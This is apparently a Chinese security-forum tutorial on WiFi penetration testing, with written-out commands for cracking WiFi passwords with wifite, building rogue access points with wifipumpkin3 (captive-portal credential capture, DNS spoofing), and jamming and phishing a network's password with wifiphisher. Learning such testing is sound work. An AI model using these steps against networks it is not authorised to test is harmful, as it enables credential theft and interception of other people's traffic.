首页
社区
课程
招聘
WIFI安全测试手册:入门篇
2023-2-24 17:02 11633

WIFI安全测试手册:入门篇

2023-2-24 17:02
11633

准备工作

外置网卡:磊科(netcore)NW392


芯片信息

当前此设备需手动安装驱动

apt install realtek-rtl88xxau-dkms //需输入y进行继续安装

注意:由于网络速度,进度69%、85%可能需要等待一段时间

安装完毕,重启

无线网卡状态查询

iwconfig    //查看无线信息

Mode:Monitor 可监听附件无线设备通讯

Mode:Managed 可连接附件无线设备

更改网卡工作模式:iwconfig 网卡名称 mode 工作模式,

测试常用模式例举如下

iwconfig wlan0 mode Managed

iwconfig wlan0 mode Monitor


实战讲解

破解WIFI密码,使用wifite工具进行测试

新版本的wifite:https://github.com/kimocoder/wifite2

安装与启动方法:

$ git clone https://github.com/kimocoder/wifite2.git
$ pip3 install -r requirements.txt  //安装依赖,正常情况下kali系统内无需执行此命令(依赖满足)
$ cd wifite2
$ sudo ./wifite.py
$ sudo python3 setup.py install //安装到系统选项

备注:当前kali内置wifite版本没有GitHub新 (攻击操作需root权限运行wifite命令)

输入 -h 参数运行显示wifite的帮助信息

输入-h -v参数运行以显示更多帮助信息

此输出信息可查看默认密码包保存路径

GitHub---当前路径wordlist-probable.txt

Kali---usr/share/dict/wordlist-probable.txt

  • 默认攻击方式:

无参数以root权限运行wifite

检测运行设备的无线网卡情况并将无线网卡的模式改为monitor(以检测附近的WIFI通信)

开始自动扫描附件的WIFI设备,直达输入Ctrl+c 暂停

输入Ctrl+c暂停扫描并根据测试目的输入对应参数以开始WIFI密码破解

破解指定设备:输入WiFi对应的序号即可

所有设备:输入“all”参数

  • 攻击指定设备:

可通过 -e参数加设备essid信息进行指定操作

  • 常用组合参数讲解:

备注:这里是在wifite文件夹路径下执行的命令

sudo ./wifite.py --kill -i wlan0 -mac -pow 50  --dict /password.txt 

杀死冲突进程使用wlan0网卡开启mac地址随机化后使用指定字典攻击信号强度大于或等于50的WIFI设备


欺骗攻击,使用wifipumpkin3工具进行测试

GitHub:https://github.com/P0cL4bs/wifipumpkin3

在线安装手册:https://wifipumpkin3.github.io/docs/getting-started#installation

在kali系统上的安装示例

sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

注意:scapy警告问题


更新scapy版本

https://github.com/secdev/scapy



  • 创建一个WiFi
set interface wlan0
# 设置将要创建的接入点的名称
set ssid TestWIFI
# 设置noproxy plguin
set proxy noproxy
# 忽略来自pydns_server的所有日志 
ignore pydns_server
start

//pumpkinproxy - 用于拦截TCP协议的网络流量的代理。
//captiveflask - 允许阻止用户访问互联网,直到他们打开登录页面。
//noproxy - 运行无代理的重定向流量


搜索到创建的wifi


访问测试网址输入账号密码登录测试

http://testphp.vulnweb.com/login.php

  • 便捷启动脚本

将之前测试的命令保存到以pulp后缀的文件

以--pulp参数加载

  • 代理模式设置

默认 pumpkinproxy //可用于拦截模式的代理

开启代理插件

关闭代理插件

captiveflask代理模式 //连接WIFI后会弹窗的特定页面


捕获到的提交内容

  • DNS劫持
set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start

  • 其它常用命令参数

show //显示可用攻击模块

jobs //显示正在后台运行的攻击模块

ap //显示创建的WIFI信息

proxies //显示可用代理模式与功能

security //WIFI安全模式,可设置密码与保护方式

更改密码

钓鱼攻击,使用Wifiphisher工具进行测试

GitHub:https://github.com/wifiphisher/wifiphisher

注意:需有两个无线设备

自动扫描附件的WIFI设备

选择要测试的目标Enter确认,这里选择验证欺骗模式进行演示

1 - Network Manager Connect

生成需要认证的WIFI

干扰正常WIFI并自动连接生成的WIFI

显示攻击情况

ESC退出并会在终端显示捕获的输入信息



[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

收藏
点赞1
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回